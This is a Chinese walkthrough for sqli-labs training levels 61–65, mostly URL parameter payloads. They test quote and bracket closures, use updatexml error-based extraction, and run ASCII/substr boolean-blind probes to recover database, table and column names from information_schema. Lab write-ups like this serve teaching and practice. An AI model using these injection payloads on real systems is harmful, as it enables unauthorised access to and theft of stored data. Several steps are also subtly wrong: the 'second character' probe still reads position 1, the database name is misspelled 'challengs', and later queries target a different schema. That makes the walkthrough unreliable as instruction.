sqli-labs靶场通关攻略(六十一关到六十五关)

sqli-labs-master靶场第六十一关

步骤一,判断闭合方式

?id=1')) --+

步骤二,查看数据库

?id=1')) and updatexml(1,concat(1,(select database())),1) --+

步骤三,查看表名

?id=-1')) and updatexml(1,concat(1,(select group_concat(table_name)from information_schema.tables where table_schema='security')),1) --+

步骤四,查看users表中列名

?id=1')) and updatexml(1,concat(1,(select group_concat(column_name) from information_schema.columns where table_schema='security' and table_name='users')),1) --+

sqli-labs-master靶场第六十二关

步骤一,判断闭合方式

?id=1') --+

步骤二,查看数据库

判断数据库的第一个字符:

用ascii码截取数据库的第一位字符 判断第一位字符的ascii码是否大于98 页面显示正常 说明数据库第一位字符ascii码大于98

?id=1') and ascii(substr(database(),1,1))>98--+

判断数据库第一位字符的ascii码是否大于99 页面显示异常 说明不大于 大于98不大于99 说明第一位字符ascii码等于99

?id=1') and ascii(substr(database(),1,1))>99--+

判断数据库的第二个字符:

用ascii码截取数据库的第一位字符 判断第一位字符的ascii码是否大于103 页面显示正常 说明数据库第二位字符ascii码大于103

?id=1') and ascii(substr(database(),1,1))>103--+

判断数据库第一位字符的ascii码是否大于104页面显示异常 说明不大于 大于103不大于104 说明第二位字符ascii码等于104

?id=1') and ascii(substr(database(),1,1))>104--+

以此类推...最终得出challengs

步骤三,查看表名

查security数据库中第一张表的第一位字符

用ascii码截取数据库的第一位字符 判断第一位字符的ascii码是否大于100 页面显示正常 说明数据库第一位字符ascii码大于100

?id=1') and ascii(substr((select table_name from information_schema.tables where table_schema='security' limit 0,1),1,1))>100--+

判断数据库第一位字符的ascii码是否大于101 页面显示异常 说明不大于 大于100不大于101 说明第一位字符ascii码等于101

?id=1') and ascii(substr((select table_name from information_schema.tables where table_schema='security' limit 0,1),1,1))>101--+

大于100不大于101 说明第一张表的第一位字符等于101 'e'

以此类推...最终得出第一张表的表名为emails

步骤四,查看users表中列名

查看users表中第一个字段的第一位字符

?id=1') and ascii(substr((select column_name from information_schema.columns where table_schema='security' and table_name='users' limit 0,1),1,1))>104--+

?id=1') and ascii(substr((select column_name from information_schema.columns where table_schema='security' and table_name='users' limit 0,1),1,1))>105--+

说明users表的第一个字段的第一位字符ascii码为105 'i'

以此类推...最终得出users表的第一个字段为id

sqli-labs-master靶场第六十三关

步骤一,判断闭合方式

?id=1' --+

步骤二,查看数据库

判断数据库的第一个字符:

用ascii码截取数据库的第一位字符 判断第一位字符的ascii码是否大于98 页面显示正常 说明数据库第一位字符ascii码大于98

?id=1' and ascii(substr(database(),1,1))>98--+

判断数据库第一位字符的ascii码是否大于99 页面显示异常 说明不大于 大于98不大于99 说明第一位字符ascii码等于99

?id=1' and ascii(substr(database(),1,1))>99--+

以此类推...最终得出challengs

步骤三,查看表名

查security数据库中第一张表的第一位字符

用ascii码截取数据库的第一位字符 判断第一位字符的ascii码是否大于100 页面显示正常 说明数据库第一位字符ascii码大于100

?id=1' and ascii(substr((select table_name from information_schema.tables where table_schema='security' limit 0,1),1,1))>100--+

判断数据库第一位字符的ascii码是否大于101 页面显示异常 说明不大于 大于100不大于101 说明第一位字符ascii码等于101

?id=1' and ascii(substr((select table_name from information_schema.tables where table_schema='security' limit 0,1),1,1))>101--+

大于100不大于101 说明第一张表的第一位字符等于101 'e'

以此类推...最终得出第一张表的表名为emails

步骤四,查看users表中列名

查看users表中第一个字段的第一位字符

?id=1' and ascii(substr((select column_name from information_schema.columns where table_schema='security' and table_name='users' limit 0,1),1,1))>104--+

?id=1' and ascii(substr((select column_name from information_schema.columns where table_schema='security' and table_name='users' limit 0,1),1,1))>105--+

说明users表的第一个字段的第一位字符ascii码为105 'i'

以此类推...最终得出users表的第一个字段为id

sqli-labs-master靶场第六十四关

步骤一,判断闭合方式

?id=1)) --+

步骤二,查看数据库

判断数据库的第一个字符:

用ascii码截取数据库的第一位字符 判断第一位字符的ascii码是否大于98 页面显示正常 说明数据库第一位字符ascii码大于98

?id=1)) and ascii(substr(database(),1,1))>98--+

判断数据库第一位字符的ascii码是否大于99 页面显示异常 说明不大于 大于98不大于99 说明第一位字符ascii码等于99

?id=1)) and ascii(substr(database(),1,1))>99--+

以此类推...最终得出challengs

步骤三,查看表名

查security数据库中第一张表的第一位字符

用ascii码截取数据库的第一位字符 判断第一位字符的ascii码是否大于100 页面显示正常 说明数据库第一位字符ascii码大于100

?id=1)) and ascii(substr((select table_name from information_schema.tables where table_schema='security' limit 0,1),1,1))>100--+

判断数据库第一位字符的ascii码是否大于101 页面显示异常 说明不大于 大于100不大于101 说明第一位字符ascii码等于101

?id=1)) and ascii(substr((select table_name from information_schema.tables where table_schema='security' limit 0,1),1,1))>101--+

大于100不大于101 说明第一张表的第一位字符等于101 'e'

以此类推...最终得出第一张表的表名为emails

步骤四,查看users表中列名

查看users表中第一个字段的第一位字符

?id=1)) and ascii(substr((select column_name from information_schema.columns where table_schema='security' and table_name='users' limit 0,1),1,1))>104--+

?id=1)) and ascii(substr((select column_name from information_schema.columns where table_schema='security' and table_name='users' limit 0,1),1,1))>105--+

说明users表的第一个字段的第一位字符ascii码为105 'i'

以此类推...最终得出users表的第一个字段为id

sqli-labs-master靶场第六十五关

步骤一,判断闭合方式

?id=1") --+

步骤二,查看数据库

判断数据库的第一个字符:

用ascii码截取数据库的第一位字符 判断第一位字符的ascii码是否大于98 页面显示正常 说明数据库第一位字符ascii码大于98

?id=1") and ascii(substr(database(),1,1))>98--+

判断数据库第一位字符的ascii码是否大于99 页面显示异常 说明不大于 大于98不大于99 说明第一位字符ascii码等于99

?id=1") and ascii(substr(database(),1,1))>99--+

以此类推...最终得出challengs

步骤三,查看表名

查security数据库中第一张表的第一位字符

用ascii码截取数据库的第一位字符 判断第一位字符的ascii码是否大于100 页面显示正常 说明数据库第一位字符ascii码大于100

?id=1") and ascii(substr((select table_name from information_schema.tables where table_schema='security' limit 0,1),1,1))>100--+

判断数据库第一位字符的ascii码是否大于101 页面显示异常 说明不大于 大于100不大于101 说明第一位字符ascii码等于101

?id=1") and ascii(substr((select table_name from information_schema.tables where table_schema='security' limit 0,1),1,1))>101--+

大于100不大于101 说明第一张表的第一位字符等于101 'e'

以此类推...最终得出第一张表的表名为emails

步骤四,查看users表中列名

查看users表中第一个字段的第一位字符

?id=1") and ascii(substr((select column_name from information_schema.columns where table_schema='security' and table_name='users' limit 0,1),1,1))>104--+

?id=1") and ascii(substr((select column_name from information_schema.columns where table_schema='security' and table_name='users' limit 0,1),1,1))>105--+

说明users表的第一个字段的第一位字符ascii码为105 'i'

以此类推...最终得出users表的第一个字段为id

相关推荐
weixin_307779135 分钟前
Linux下Docker Compose里运行Milvus向量数据库故障诊断Shell脚本
linux·运维·数据库·docker·milvus
Mem0rin14 分钟前
【MySQL】MySQL 增删改查(CRUD)
数据库·mysql
吴声子夜歌28 分钟前
Redis 6.x——监控指标
数据库·redis·缓存
再让我睡两分钟32 分钟前
【无标题】
android·java·数据库·人工智能·prompt·ai应用开发
爸爸6191 小时前
30 原始 SQL 查询与聚合统计:querySql 实战
数据库·sql·华为·harmonyos·鸿蒙系统
砍材农夫1 小时前
spring|spring event|Spring内置事件驱动编程模型
java·数据库·spring
tiancaijiben10 小时前
阿里云SSL证书自动续签与部署完全指南:从托管服务到开源工具全方案解析
数据库
全堆鸿蒙10 小时前
25 数据库设计与表结构规划:5 张表的设计思路
数据库·华为·cocoa·harmonyos
笃行35010 小时前
【金仓数据库产品体验官】_坏得起_实测:备份恢复、PITR 时间穿越与主备切换——KingbaseES V9R3C18 深度体验(三)
数据库
喜欢的名字被抢了12 小时前
Python实战:SQLAlchemy ORM与FastAPI项目集成
开发语言·python·sql·教程·fastapi